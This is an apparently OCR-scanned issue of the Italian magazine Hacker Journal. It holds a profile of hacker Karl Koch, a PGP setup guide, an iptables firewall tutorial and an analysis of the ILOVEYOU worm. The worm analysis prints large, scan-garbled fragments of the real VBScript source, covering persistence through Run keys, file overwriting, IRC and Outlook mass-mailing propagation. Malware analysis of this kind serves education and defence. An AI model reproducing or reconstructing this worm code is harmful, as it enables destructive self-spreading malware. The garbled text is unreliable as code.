diventare "davvero" un hacker, 
questa guida scritta da Eric S. Rey- 
mond è il posto giusto da cui parti- 
re. L'indirizzo qui sopra si riferisce 
alla sua traduzione italiana (c'è co- 
munque il link all'originale inglese 
per chi lo preferisce). Tra le altre 
cose degne di nota scritte o curate 
da Eric, ci sono senz'altro il Jargon 
File e The Cathedral and the Ba- 
zaar. Ci arrivate dalla sua home 
page: www.tuxedo.org/-esr 



IT 



hackerjournal.it 

E attiva la sezione link del nostro 
sito: se hai un sito dedicato 
all'hacking o alla tecnologia in 
generale, puoi aggiungerlo alla 
nostra directory, che è in continua 
crescita. 

La pagina con il modulo da 
compilare per l'inserimento è 



www.hackerjoumal.it/Links/Links.htm 
Fai clic su "Aggiuni un sito" e 
compila il modulo in ogni sua 
parte. 
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Un numero misterioso, 
anarchico: il 23. 
Rock è morto il 23.5 
all'età di 23 anni. Tutti i più 
grandi anarchici sono morti il 
giorno 23, come scrisse "Der 
Spiegel". Quel numero attirò 
molto Karl, nel suo studio sulle 
cospirazioni. Pensò ad esempio 
all'omicidio del primo ministro 
svedese Olof Palme, avvenuto una 
sera alle 23 e 23. L'idea ultima 
che aveva Karl era che tutti 
noi, senza saperlo, serviamo gli 
scopi degli Illuminati. Il 
numero 23 proviene proprio dal 
romanzo di Robert Anton Wilson 
diventato un cult per l'hacker 
tedesco, e il 23 si ritrovò nel 
racconto (23 Skidoo!) dello 
scrittore Burroughs, amico di 
Wilson. Burroughs, una volta, 
raccontò di aver conosciuto un 
marittimo che navigava da 23 
anni e che si vantava di non 
aver mai avuto incidenti: quello 
stesso giorno il traghetto su 
cui viaggiava questo marittimo 
affondò. Alla sera Burroughs 
accese la radio per 
ascoltare tutte 
le notizie sulla 
vicenda e 
ascoltò un'altra 
notizia: un aereo 
era precipitato 
sulla rotta New 
York - Miami: il 
volo era registrato 
col numero 23! E .* 
ancora: il 23.5.1949 
entrò in vigore la 
costituzione della 
Repubblica federale 
Tedesca in vigore fino al 
23.5.1999. E lo sapete che il 
23.5 vennero uccisi Bonnie & 
Clyde e il magistrato Giovanni 
Falcone? Infine, il giorno 
dell'inizio delle riprese di 23, 
morì Borroughs . Un numero, un 
destino. 



Ci sona tutti gli elementi del gialla nella starla 
di Karl Koch, l'hacker tedesca marta in 
circostanze misteriose... 



n Pc, una linea telefonica, un ge- 
nio dei computer un po' sbanda- 
to, la sua morte misteriosa. Ci so- 
no proprio tutti gli ingredienti del 
giallo nella storia di Karl Koch, I'- 
hacker tedesco morto bruciato nella sua 
auto il 23 maggio del 1989, pochi giorni 
prima di deporre in tribunale per una storia 
ancora tutta da comprendere. Koch, genio ri- 
belle, infanzia difficile e adolescenza fatta di 
spinelli e coca, del computer ha fatto la sua 
vita. E, forse, proprio per il computer, l'ha 



» Giachi pericolasi 



Quando le sue azioni di hackeraggio l'han- 
no spinto a infilarsi nelle reti informatiche sta- 
tunitensi, inizialmente solo per gioco, le cose 
si sono fatte più grosse di lui, di Pengo e di 
quel gruppo di aderenti al Chaos Com- 
puter Club. Sì, perché in una Germa- 
nia alle prese con la caduta del 
ì muro di Berlino, questo gruppo di 
£ giovanissimi hackers decise di 
% porre all'attenzione del Kgb tutto 
il materiale raccolto. Materiale im- 
Sv portante? Probabilmente no. Ma la 
storia di Koch non può comunque 
non affascinare. L'innamoramento 
nei confronti di Hagbard Celine, fi- 
a centrale del romanzo Gli Ulu- 
lati!, non è semplicemente il vo- 
;ercare una figura di mitizzare a 
ti. Ha solo 14 anni, Karl, quando 
legge un romanzo regalatogli forse per sba- 
glio dal padre alcolista. Gli Illuminati so- 
no una potente congregazione segre- 
ta che tenta di provocare la terza 
guerra mondiale; Hagbard Celine tenta 
di combatterli. "Lui è un folle genio - ricorda 
spesso Karl - altamente qualificato, in grado 
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Kans-cnrisrton sctimio 
Michael Culmo 
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k23, la storia dell'hacker Karl Koch 
è il libro di Hans-Christian Schmid 
e Michael Gutmann scritto sulla 
vicenda del giovane hacker tede- 
sco morto il 23 maggio del 1989. 
Da queste pagine è stato tratto 
anche il film "23", interamente 
dedicato al mondo hacker. Il libro 
è edito dalla ShaKe edizioni 
Underground (viale Bligny 42 - 
Milano). 



riano dalla giurisprudenza all'ingegneria". 
Sceglie di fare il pirata, Hagbard, viaggiando 
sul suo sottomarino dorato. Si avvale della 
collaborazione di un computer (Fuckup) che 
calcola senza sosta il destino del mondo. Un 
personaggio affascinante. Che lo accompa- 
gnerà nella sua crescita. In pochi anni Karl 
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Karl Koch 



H«IA?D CI LIN€ 
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dita del padre compra un computer potente 
che gli permette, finalmente, "di entrare nel 
modo giusto nella scena dei computer". 
Un'entrata forte, sconvolgente. Karl passa le 
sue notti davanti al monitor, la mattina ci so- 
no montagne di carta vicino alla stampante. 
Si nutre di caffè e succhi multivitamini- 
ci, fuma sigarette e dall'hashish è 
passato a droghe più pesanti. Il pavi- 
mento è un tappeto di dischetti e ma- 
trici per incidere schede. Che cosa stava 
facendo? A che cosa stava lavorando quel 
Karl Koch, a un passo dalla maggiore età, 
diventato ormai nel mondo degli informatici 
semplicemente "Hagbard"? Gli atti eroici 
degli hacker americani ormai sono ben noti 
anche in Germania e nell'84 nasce il Chaos 
Computer Club. Con quale scopo? "Effet- 



JL 



Kjr. 

"Hagbwrd Cihn*" 

Koch 



. Uhi ai u- 



di hackeraggio si fanno sempre più frequen- 
ti. Quando parte l'azione di hacking al cen- 
tro di ricerca nucleare Fermilab di Chicago, 
Hagbard è in primissima linea. L'Fbi lo sco- 
pre, ma non ci sono prove e il vuoto legislati- 
vo fa il resto, per una materia legale ancora 
tutta da scoprire. La banca dati Optimis del 
Pentagono, poi, diventa l'obiettivo preferito 
degli hacker, ma Karl pensa ad altro: il 
Norad, ovvero il centro di controllo 
strategico per la difesa aerea degli 
Usa. Vuole entrare nel sistema proprio come 
nel film War Games. Scopre l'accesso e in 
accordo con l'hacker Urmel, decide di... la- 
sciar perdere. "Sarebbero stati guai". 

» Una missione 



Ma le lunghe notti trascorse davanti al com- 
puter convincono Karl di una cosa: ha una 
missione personale nell'imminente 
guerra informatica tra le potenze 
mondiali. Un'idea, questa, maturata e cor- 
roborata dai successi nell'hacking notturno, 
quando ogni calcolatore che sembra appa- 



rentemente inaccessibile diventa, in realtà, 
facile da "scardinare". Gli hacker escono 
piano piano allo scoperto, anche con lo sco- 
po di gettare lontane le accuse di essere solo 
dei criminali: durante la fiera informatica Ce- 
bit di Hannover, così, Hagbard ha un volto 
anche per i giornalisti: si mette alla scrivania, 
davanti a un computer, e inizia a violare la li- 
nea delle poste tedesche, scruta i dati dell'U- 
niversità di Caltec, in California. I giornali ini- 
ziano a concentrarsi sempre più sulle vicende 
di questa dozzina di hackers tedeschi capaci 
di entrare anche nel computer centrale della 
Nasa. E quando a qualcuno viene in 
mente di rivolgersi ai servizi segreti 
russi, il gioco dura poco. Arrivano i soldi 
per Karl, Pengo, Dob e Pedro, ma arrivano 
anche i guai. Karl finisce in un angolo, sem- 
pre più isolato. Viene costantemente pedina- 
to dai servizi segreti dell'Est e naufraga nei 
suoi pensieri sugli Illuminati. Cerca di riemer- 
gere, cerca soldi, cerca di trovare lo scoop 
per giornalisti pronti a tutto... Trova soltanto 
la morte. Suicidio, scrivono sui documenti uf- 
ficiali. L'hanno suicidato, dice qualcuno. 
Fine di un hacker. Sbandato, ma geniale, cj 
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tuare servizi di pattuglia ai margini dell'irri- 
conoscibile, sensibilizzando l'opinione pub- 
blica sul problema della sicurezza dei dati... 
comportandosi in modo offensivo ma ami- 
chevole, sottolineando come gli hacker mo- 
strino proprio i punti deboli nel settore della 
sicurezza". Scrive Karl in un'autobiografia: 
"Con un paio di eccezioni, vivo nell'isola- 
mento del mio ambiente e della mia cerchia 
di amicizie. Le sessioni di hackeraggio dura- 
no giorni e notti. Comunico, nella maggior 
parte dei casi, tramite il computer... Dedico 
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http://www.hagbard-celine.de/ 

http://www.decoder.it 

http://www.shake.it 

http://www.mtr. webconcept.de/D/ 

KarlKoch.html 

http://www.ccc.de/ 
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SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO 

/ secreti <f et virus 
/ óve You 

Il mese di maggio del 2000 è stato - informaticamente - 

segnato dalla comparsa del virus "I Love You", questo 

si propagava per e-mail sotto forma di allegato. 

Con un nome così accattivante, furono numerose le vittime a 

cadere nel tranello. Scopriamo oggi i segreti 

sul funzionamento di uno dei virus più famosi del mondo... 



ÌLove You è un programma scritto in Visual Basic 
Script, linguaggio prossimo a Visual Basic. Il virus è 
contenuto in una cartella chiamata "Love Letter for 
you.txtx.vbs". Di primo acchito questa doppia esten- 
sione può essere molto vistosa, ma al contrario, 
questa permette di attrarre l'attenzione delle vittime. 
Di sistema, Windows nasconde le estensioni conosciute. Vbs è 
un'estensione riconosciuta da Windows ed eseguibile con 
Wscript.exe. Il nome del file virus appare solo con il nome di 
"Love letter for you.txt", ciò può portare a pensare che si tratti 
unicamente di un file di testo classico. L'avrete capito, in caso 
di apertura di questo file, non sarà il bloc-notes ad essere lan- 
ciato, ma Wscript.exe eseguendo il virus. Parecchie conse- 
guenze seguono l'esecuzione di questo virus. Innanzitutto al- 
cuni dati nel database vengono modificati permettendo così al 
virus di essere lanciato ad ogni avvio del vostro computer; di 
seguito alcuni parametri di Internet Explorer per facilitare la 
proliferazione di un cavallo di troia. Ma il più grave problema, 
che spiega la enorme diffusione del virus, è che durante l'ese- 
cuzione viene automaticamente rispedito come allegato (così 
come l'abbiamo ricevuto) ai contatti della nostra rubrica di 
Outlook. Così senza nemmeno saperlo, non solo infettate il 
vostro computer, ma contribuite a propagarlo. Infine questo vi- 
rus è stato diffuso tramite IRC, vale a dire una rete di chat. 
Scopriamo assieme una parte del code source di questo virus 
con il fine di capire meglio come funziona e come il virus I Lo- 
ve You abbia potuto diffondersi così facilmente. 



» Firma degli autori 

rem barok -loveletter (vbe) 

rem by: spyder / ispyder@mail.com / 

gGRAMMERSoft Group / 

Manila , Philippines 



Le due prime righe del code source corrispondono al- 
la firma degli autori del virus, firma che dall'inizio ha 
fatto pensare che il virus provenisse dalle filippine. 



» Diffusione del uirus nel nostro 
sistema 



Set dirwin = f so . GetSpecialFolder (0) 
Set dirsystem = f so .GetSpecialFolder (1) 
Set dirtemp = f so .GetSpecialFolder (2) 
Set e = fso.GetFile (WScript . ScriptFullNa- 
me) 

e . Copy (dirsystem& " \MSKernel32 . vbs " ) 
e . Copy (dirwin& " \Win32DLL . vbs " ) 
e . Copy (dirsystem& " \LOVE-LETTER-FOR- 
YOU.TXT.vbs") 
[...] 

Grazie a questa sintassi il virus è copiato in diversi file come: 

C : \Windows\System\MSKernel32 .vbs 

C : \Windows\System\Win32DLL . vbs 

C : \Windows\System\ LOVE-LETTER-FOR- 

YOU.TXT.vbs 

sub regruns ( ) 

On Error Resumé Next 

Dim num, down re ad 

regereate 

"HKEY_LOCAL_MACHINE\Software\Microsoft\Win 

dows\CurrentVersion\Run\MSKernel32 

11 , dirsystem& " \MSKernel32 . vbs " 

regereate 



14 | www.hackerjournal.it 



"HKEY_LOCAL_MACHINE\Software\Microsoft\Win 

dows\CurrentVersion\RunServices\Wi 

n32DLL" , dirwinfi " \Win32DLL . vbs " 

downread= " " 

downread=regget ( "HKEY_CURRENT_USER\Softwa- 

re\Microsoft\ Internet 

Explorer \Download Directory") 

if (downread="") then 

downread= " e : \ " 

end if 



» Infezione dei file con il uirus 



In più, la procedura regruns infetta la base dei registri con il fine 
di eseguire ad ogni avviodel vostro PC. Notiamo che altre modi- 
fiche vengono fatte al database, come quella che permette il 
download automatico del cavallo di troia con l'intento di infetta- 
re il computer. 

if (ext="vbs") or (ext="vbe") then 
set ap=f so . OpenTextFile (fi .path, 2,true) 
ap.write vbscopy 
ap.close 

Così il computer cancella i file che contengono l'estensione 
.vbs e .vbe 

elseif (ext=" js") or (ext="jse") or 

(ext="css") or (ext="wsh") or (ext="sct") 

or (ext="hta") then 

set ap=f so . OpenTextFile (fi .path, 2, true) 

ap . write vbscopy 

ap. close 

bname=f so . GetBaseName (fi . path) 

set cop=f so . GetFile ( fi . path) 

cop . copy ( f olderspec& " \ " &bname& " . vbs " ) 

f so . DeleteFile ( fi . path) 

succede la stessa cosa ai file con esten- 
sione .js, .jse, . css, .wsh, .set, e 
.hta, vengono eliminati e sostituiti da 
file con estensione .vbs 

elseif (ext="jpg") or (ext=" jpeg") then 

set ap=f so . OpenTextFile (fi .path, 2, true) 

ap.write vbscopy 

ap.close 

set cop=f so . GetFile ( fi . path) 

cop . copy ( fi . path& " . vbs " ) 

f so . DeleteFile ( fi . path) 

idem per i file con estensione . jpg e 
. jpeg che sono cancellati e rimpiazzati 
da file con lo stesso nome ma aventi 1 ' e- 
stensione .vbs 
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Espressione impaurita, tracce di acne sul 
viso, scarpe da ginnastica tipo rapper: 
così il ventitreenne filippino Onel De 
Guzman appare improvvisamente 
di fronte all'opinione pubblica 
internazionale a pochi giorni 
dall'esplosione del virus I love you. Le 
accuse a suo carico sono pesanti: è ritenuto responsabile di 
aver creato e immesso in Rete il virus informatico più dannoso 
mai creato. Orfano di padre, sua madre è proprietaria di una 
piccola flotta di pescherecci. 

Appassionato di computer fin da bambino, era uno dei 
migliori studenti dell'Ama, una catena di college 
informatici molto popolare nel Sud-Est asiatico. Lì entrò a far 
parte di un gruppo chiamato Grammersoft. Si tratta di giovani 
di talento accomunati dalla passione per i computer e dalla 
voglia di farsi largo come programmatori. 
Sarà proprio quel fatidico nome, inserito 
probabilmente per vezzo e ritrovato all'interno dello 
script di I love you, a convogliare i sospetti su di lui. 
Nonostante le prove schiaccianti a suo carico e la richiesta di 
estradizione negli Stati Uniti dell'Fbi, non è mai stato 
incriminato perché nelle Filippine, al momento del 
fatto, mancava una legge sulla pirateria informatica. 
De Guzman, che nel mondo degli hacker, e per molti 
ragazzi filippini, è ormai un Robin Hood che si batte per un 
Internet "democratico" e soprattutto gratuito, si è sempre 
dichiarato innocente, rinfocolando i dubbi legali 
legati ai crimini informatici. 

Tutto ciò mentre nel mondo serpeggiano i timori sulla 
debolezza della Rete, sempre più centrale nelle economie 
occidentali, attaccabile persino da intraprendenti studenti di 
paesi in via di sviluppo. 



elseif (ext="mp3") or (ext="mp2") then 

set mp3=f so . CreateTextFile ( fi . path& " . vbs " ) 

mp3 . write vbscopy 

mp3 . close 

set att=f so . GetFile ( fi . path) 

att . attributes=att . attributes+2 

end if 

la stessa sorte tocca ai file .mp3 e .mp2 

if (eqofolderspec) then 

if (s= "mirc32.exe") or (s="mlink32 .exe") 

or (s= "mire. ini") or 

(s=" script .ini") or (s= "mire. hip") then 

set script ini=f so . CreateTextFile ( f older- 

spec& " \script . ini " ) 

script ini .WriteLine "[script]" 

scriptini . WriteLine " ; mIRC Script " 

scriptini .WriteLine "; Please dont edit 

this script. . . mIRC will corrupt, 

if mIRC will" 

scriptini .WriteLine " corrupt... WINDOWS 

will affect and will not run 
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SVISCERATO, STRINGA PER STRINGA, IL VIRUS PIÙ FAMOSO 





correctly. thanks" 




"fimalead, 1, "REG_DWORD" 






scriptini . WriteLine " ; " 




end if 






script ini .WriteLine " ; Khaled Mardam-Bey" 




x=x+l 






scriptini . WriteLine " ; http : //www . mire . com" 




next 






scriptini .WriteLine " ; " 




regedit . RegWrite 






scriptini. WriteLine "n0=on l:JOIN:#:{" 




"HKEY_CURRENT_USER\Software\Microsoft\WAB\ 






scriptini .WriteLine "nl= /if ( $nick == 




"&a, a. AddressEntries .Count 






$me ) { halt }" 




else 








scriptini .WriteLine "n2= /.dee send $nick 




regedit . RegWrite 








" &dirsystem& " \LOVE-LETTER-FOR-YOU . HTM" 




"HKEY_CURRENT_USER\Software\Microsoft\WAB\ 






scriptini .WriteLine n n3=}" 




"&a, a. AddressEntries .Count 






scriptini . close 




end if 








eq=folderspec 




next 








end if 




Set out=Nothing 








end if 




Set mapi=Nothing 






next 




end sub 






end sub 




La sintassi qui sopra permette semplicemente di creare il messag- 






Il virus 1 love You testa infine il nostro computer per verificare la 




gio e-mail contenente il virus e di spedirlo a tutti i membri della 






presenza del programma Mire, che permette di accedere alle chat 




vostra rubrica. Ci accorgiamo inoltre che il soggetto che contiene 






Ire. Se è così il virus si servirà di questo programma con il fine di 




il virus è "1 Love You", che il corpo del messaggio, vale a dire il te- 






propagarsi ad altri utenti. 




sto è "kindly check the attacched loveletter coming from me". L'a- 
vrete capito, questo messaggio personale che chiede al nostro 
corrispondente di aprire la lettera d'amore in allegato, è destina- 
to ad attirare la curiosità dei nostri corrispondenti con il fine di 






» Prooagazione del uirus attrauerso 








_ Outlook 




spingerli ad aprire l'allegato. Infine, il file source del virus (love let- 










te r for you.txt.vbs) viene aggiunto come allegato nelle mail invia- 
te ai vostri corrispondenti. 






x=l 




Nel code source del file contenente il virus 1 Love You una proce- 






regv=regedit . RegRead ( "HKEY_CURRENT_USER\So 




dura genera automaticamente una pagina HTML che sarà tra- 






ftware\Microsoft\WAB\"&a) 




smessa ai nostri corrispondenti via IRC. Questa pagina HTML con- 






if (regv=" n ) then 




tiene un ActiveX (vbscript) con il fine di richiamare l'attenzione del- 






regv=l 




la vittima. La sintassi seguente permette di far defilare un testo. 






end if 

if (int (a . AddressEntries . Count) >int (regv) ) 

then 










» Diffusione del uirus Llia IRC 






for ctrentries=l to a. AddressEntries .Count 










malead=a. AddressEntries (x) 










regad= n " 




sub html 






regad=regedit . RegRead ( "HKEY_CURRENT_USER\S 




On Error Resumé Next 






oftware\Microsoft\WAB\"&malead) 




dim 






if (regad= ,,n ) then 




lines , n, dtal , dta2 , dt 1 , dt2 , dt 3 , dt 4 , 11 , dt5 , d 

te 

dtal="<HTML><HEAD><TITLE>LOVELETTER - 






In questa parte del code source del virus, possiamo confermare 








che il virus richiama l'applicazione Wab.exe. se lanciate l'applica- 




HTML<?-?TITLE><META 






zione dal menù Start\Esegui potrete rendervi conto che si tratta di 




NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS 






una rubrica di Outlook. Come abbiamo già detto il virus si tra- 




- LOVELETTER@-@>"&vbcrlf& _ 






smette automaticamente a tutti i contatti che fanno parte della no- 




"<META NAME=@-@Author@-@ CONTENT=@-@spyder 






stra rubrica, senza che ce ne si accorga neppure. 




?-? ispyder@mail.com ?-? 

@GRAMMERSoft Group ?-? Manila, Philippines 






set male=out . Createltem ( ) 




?-? March 2000@-@>"&vbcrlf & _ 






male . Recipients . Add (malead) 




"<META NAME=@-@Description@-@ C0NTENT=@- 






male. Sub ject = "ILOVEYOU" 




@simple but i think this is 






male. Body = vbcrlf &"kindly check the atta- 




good. . .@-@>"&vbcrlf& _ 






ched LOVELETTER coming f rom me . " 




"<?-?HEAD><B0DY 






male . Attachment s . Add (dirsystem& " \LOVE-LET- 




0NM0USE0UT=@-@window . name=#-#main#-# ; win- 






TER-FOR-YOU . TXT . vbs " ) 




dow . open (#-#L0VE-LETTER-F0R-Y0U . HTM# 






male . Send 




-#,#-#main#-#)@-@ "&vbcrlf& _ 






regedit . RegWrite 




"ONKEYDOWN=@-@window . name=#-#main#-# ; win- 






"HKEY_CURRENT_USER\Software\Microsoft\WAB\ 




dow . open (#-# LOVE -LETTER-FOR- YOU . HTM# 
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COME INSTALLARE E USARE PGP, IL PIÙ FAMOSO PROGRAMMA DI CRITTOGRAFIA 



Tenete i dati al riparo 

Lasciate perdere le decine di softwarini che promettono di cifrare i uostri documenti: 
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^^P^^L^^^B GP perm 
^ W^ H H ^k gente co 

l_l_H ^hI ° vere '° 

^^^H I privacy o 
HhÉI I mano. 



GP permette alla 
gente comune di 
avere la propria 
privacy a portata di 
mano. 

C'è un bisogno sociale crescente di 
questo. Ecco perché l'ho creato." queste 
le parole di Philip Zimmermann, il 
padre di PGP. Che cos'è PGP? PGP sta 
per Pretty Good Privacy, ed è un 
software sviluppato nel 1991, 
appunto, da Philip Zimmermann, che 
consente di criptare mediante un 
sistema di chiavi qualsiasi tipo di dato, 
in modo da garantire la privacy, per 
esempio, nello scambio di 
informazioni via email o quant'altro. 
PGP esiste ormai in molte varianti ed il 
suo utilizzo è diffusissimo: criptare i 
dati che ci scambiamo quando 
inviamo e riceviamo messaggi di posta 



□ 



GPG Sebbene i sorgenti siano li- 
beramente disponibili, PGP è una 
proprietà intellettuale. Esiste però 
una versione completamente libe- 
ra, chiamata GPG, e pubblicata 
sotto licenza GPL (www.gnupg.org). 



elettronica, tanto per fare l'esempio 
più banale (ma anche quando 
chattiamo in ICQ, o inviamo files a 
qualcuno), dovrebbe essere, 
soprattutto per chi si interessa a tutte 
le problematiche relative alla 
sicurezza, una pratica comune. Il 
diritto e la necessità di avere una 
buona privacy vanno al di là del 
contenuto dei dati che decidiamo di 
criptare: ovvero, non è necessario 
avere "qualcosa da nascondere" per 
usare software come PGP; come 
saggiamente afferma Zimmermann, è 
figlia del buon senso comune la 
necessità di avere la propria privacy a 
portata di mano. Lasciando per un 
attimo da parte queste riflessioni sulla 
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da occhi indiscreti 



l'unico uero programma che merita considerazione è Pretty Good Priuacy 



privacy, andiamo a vedere come 
mettere in pratica il tutto: ci 
occuperemo di PGP sotto Windows, 
della sua installazione e del suo 
utilizzo nel lavoro quotidiano. Iniziamo 
con lo scaricare PGP per Windows, per 
esempio da qui: 

http://www.pgpi.org/products/pgp/ver- 
sions/freeware/ 

In questo sito (che è quello del progetto in- 
ternazionale PGP) potremo trovare anche 
altre numerose implementazioni di PGP, 
nonché versioni diverse del software per 
numerosi utilizzi e numerosi sistemi operati- 
vi. Il pacchetto per Windows 2000 pesa cir- 
ca 7 mega: una volta ultimato il download 
ci troveremo di fronte al solito file .zip nel 
quale si trova il programma. Lanciando l'in- 
stallazione, la prima cosa che ci verrà chie- 
sta sarà se siamo nuovi utenti o se posse- 
diamo già un "mazzo di chiavi" da impor- 
tare. 



» Chiaui digiteli 

Le chiavi PGP non sono altro che una serie 
di dati utilizzati per criptare e decriptare le 
informazioni: se per esempio avessimo già 
le nostre "chiavi" da usare per decriptare i 
nostri vecchi documenti, dovremo specifi- 
carlo qui in modo da poterle utilizzare. PGP 



^S^A 







lavora con una coppia di chiavi, una pub- 
blica, liberamente distribuibile per permet- 
tere ad altri di inviarci materiale cifrato, e 
l'altra privata, da custodire gelosamente e 
da non rivelare mai a nessuno. 
Supponiamo di essere nuovi utenti e andia- 
mo avanti: il wizard di installazione ci chie- 
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derà adesso di specificare quali componen- 
ti e quali plugin desideriamo installare. 
Lasciamo pure selezionate le voci preimpo- 
state. I vari Plugin risultano molto utili in 
quanto integrano PGP in altrettante appli- 
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cazioni comuni, come Outlook, ICQ o Eu- 
dora, in modo da rendere semplicissimo, 
per esempio, l'invio di email criptate: in pra- 
tica vi troverete nella barra dei bottoni del 
vostro client di posta anche quelli relativi a 
PGf? e ciò vi solleverà dal dover fare tutto a 
mano. Nel passo successivo ci verrà chiesto 
quali dispositivi di comunicazione devono 
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essere presi in considerazione (schede di 
rete e/o modem): 

A questo punto il wizard awierà l'installa- 
zione vera e propria del software. Sarà poi 
il momento di creare le nostre chiavi (quel- 
le che, come già detto, ci consentiranno ef- 
fettivamente di criptare i dati): ci verrà chie- 
sta una identità (nome ed email) e una 
pass-phrase, ovvero una frase che il soft- 
ware utilizzerà per generare le chiavi. La 
frase deve essere sufficientemente comples- 



sa. Al termine, dopo il solito riawio della 
macchina, potremo notare che tra le icone 
tray della nostra barra degli strumenti sarà 
comparsa anche quella relativa a PGP: 
Cliccandoci sopra con il tasto destro potre- 
mo selezionare tutti i vari tools di PGf^ con- 
figurarne le opzioni o andare a lavorare 
con le nostre chiavi, aggiungere utenti etc... 
A questo punto PGP è correttamente instal- 
lato sul nostro pc: andando in giro per il 
nostro disco fisso e cliccando con il tasto 
destro del mouse su un qualsiasi file potre- 
mo notare l'integrazione di PGP con il siste- 
ma operativo. 



» Conuiene usarla! 



Una volta che ci si è "fatta la mano", usare 
PGP sarà abbastanza semplice, e decisa- 
mente consigliabile. E il migliore strumento 
per proteggere i nostri documenti da occhi 
indiscreti, che purtroppo affollano la rete, cj 
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LINUX . 



TEGAMI FUIRI GLI INTRUSI - 

Ila maggior parte delle installazioni Lino» è già presente la funzionalità di 
firewall. Scoprite con noi come è possibile configurare il sistema per rifiutare 
i pacchetti sgraditi. 



inux contiene il suppor- 
to per instradamento e 
filtro dei pacchetti di re- 
te, che vengono utiliz- 
zati tramite IpTables e IP Chains. 
Ip Chains è più vecchio rispetto a 
iptables: se avete un kernel prece- 
dente al 2.2, sarete costretti a usa- 
re IPChains; se invece avete delle 
distribuzioni del kernel superiori 
(la 2.4 è la versione più stabile), 
IpTables è la scelta giusta. Que- 
st'ultimo software infatti supporta 
in più il mascheramento e i filtri di 
pacchetto (dalla 2.3, NetFilter). 
I pacchetti che attraverseranno il 
firewall vengono conforntati con le 
tabelle di ipTables; se un pacchet- 
to corriosponde a certe regole 
(dette anche ACL, da Access Con- 
trol List), il pacchetto verrà elabo- 
rato di conseguenza. 
Per la massima protezione, si con- 
siglia anche di installare un siste- 
ma di identificazione delle intru- 
sioni (IDS, di cui parleremo in se- 
guito). Linux permette di inoltrare 

» Configurazione del 
firewall come filtro 

pacchetti IP, cosa che consente di 
configurarlo come un router. Se 
avete un computer con un indiriz- 
zo di rete interna, questo compu- 
ter non potrà uscire su internet 
perchè avrà un IP che è riservato 
alle reti locali. I pacchetti entrano 
da una scheda Ethernet vengono 
tradotti e immessi su Internet con 
l'IP del router o del firewall con- 
nesso a internet. Questo tipo di 
firewall è detto server proxy. E 
inoltre possibile inoltrare o modi- 



ficare intestazioni IP I 
tramite IpTables, af- I 
finché raggiungano la 
rete Internet. 
Per fare ciò, IpTables 
manda i pacchetti al 
kernel al fine di elabo- 
rarli. Il masheramento 
sfrutta il servizio NAT 
che consente di usare 
un indirizzo IP per più 
sistemi. Questo servi- 
zio, basato su Up- 
chains, non è compati- 
bile con con i client —, - 
VPN che utilizzano 
PPTP. 

Creare una tabella con 
tutte le regole può es- 
sere un rompicapo, so- 
pratutto se si utilizza- 
no reti molto estese. 
Per questo, con in Ip- 
Tables a volte basta 
assegnare delle regole 
di default e modificarle a proprio 
piacimento. 

Per creare un filtro ai pacchetti in 
uscita (proveniente dall'interno) è 
consigliabile negare tutti gli acces- 
si e in seguito accettare quelli che 
servono a un determinato servizio. 
Per esempio, se A (computer inter- 
no) deve accedere a un servizio 
http su un server Web dall'altra 
parte del computer B (Firewall), il 
computer B dovrà lasciare aperta 
la porta 80 e 443 (per l'http) 
Per creare invece le regole per i 
pacchetti in entrata è consigliabile 
bloccare tutto il traffico ICMP al fi- 
ne di evitare gli attacchi DoS, ma 
questo potrebbe complicare la ri- 
soluzione dei problemi per una re- 
te molto ampia. 




Bisognerebbe anche bloccare tutto 
il traffico in entrata a meno che 
non faccia parte di una connessio- 
ne già aperta. 

In ipchains si utilizza l'opzione -y e 
-SYN in modo che il firewall re- 
spinga i pacchetti con il flag SYN 
impostato, invece i pacchetti con il 
bit FIN o ACK vengono accettati 
perchè fanno parte di una sessio- 
ne già aperta. 

Un'altra cosa molto importante è 
abilitare la registrazione dei pac- 
chetti. Con IPchains si utilizza il 
parametro -I, con iptables -j LOG 
(destinazione). 

Per poter usufruire del firewall a 
piene prestazioni è necessario im- 
postare le opzioni Network Packet 
Filtering nella sezione NEtWorking 
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cessive versioni invece dovrebbero 
esserci le opzioni: Network Fire- 
wall, TCP/IP networking e IP ac- 
counting. 

Quest'ultima opzione (IP accoun- 
ting) è necessaria per raccogliere i 
dati sui pacchetti e quindi permet- 
te di ottenere informazioni sull'uso 
della rete. Per questo scopo il se- 

Come si installa? 

I pacchetti IPchains e iptables 
solitamente vengono montati 
dalle più diffuse distribuzioni nel 
momento dell'installazione di 
Linux. Se così non fosse, proba- 
bilmente dovrete ricompilare il 
kernek per includere anche 
queste opzioni. 



guente file deve essere nella direc- 
tory /proc 

/proc/net/ip_acct. Se il file esiste, 
vuol dire ke il kernel supporta già 
la funzione per il filtro di pacchetti. 

Passiamo ora alle tabelle e alle 
catene. Iptables utilizza delle ta- 
belle predefinite che interagiscono 
con le interfacce del sistema e ge- 
stiscono i pacchetti di conseguen- 
za. 

Le catene sono delle regole che 
utilizza iptables. Come si può ve- 
dere nel riquadro "Le tabelle di 
iptables", questo programma uti- 
lizza tre tabelle: NAT, Mangle e 
Filter. iptables usa la tabella Flter 
per filtrare i pacchetti e la tabella, 
NAT per mascherarla ma se non è 
specificata, iptables usa quella 
predefinita, cioè Flter. 

Nella tabella filter ci sono 3 catene 

predefinite: 

INPUT : contiene le regole per i 

pacchetti in entrata; 

FORWARD: contiene le regole che 

diranno se il pacchetto necessita 

del mascheramento; 

OUTPUT : contiene le regole per i 

pacchetti in uscita; 

Nelle tabelle Nat e Mangle ci sono 



aue Tipi 
to a Filter: 

PREROUTING : modifica i pacchet- 
ti che tentano di entrare nell'inter- 
faccia 

POSTROUING : modifica i pacchet- 
ti quando lasciano l'host (in uscita) 
Passiamo alla parte pratica. Per 
stabilire quali regole applicare, 

» Azioni delle catene e 

programmazzione 
_ delle regole 

naturalmente si deve prima deli- 
neare un profilo della rete, e que- 
sta è forse la parte più complica- 
ta. I comandi sono semplici e so- 
pratutto pochi, ma la cosa più 
difficile è sapere esattamente che 
fine deve fare ogni pacchetto, al 
fine di evitare spiacevoli errori 
nel programmare le regole che 
provocano le intrusioni informati- 
che. Le azioni più utilizzate sono 
DROP e ACCEPT 
Vi conviene quindi creare una ca- 



per esempio, una per la rete in- 
terna e una per la rete esterna. Se 
non si specifica un interfaccia di 
rete, verrà usata la prima (per es 
ethO). 

In un sistema con due schede que- 
sta opzione è necessaria perchè in 
una rete si può voler bloccare tut- 
to il traffico TCP in entrata dalla 
rete ma si vuol accettarlo in usci- 
ta. Per tale scopo si utilizza l'op- 
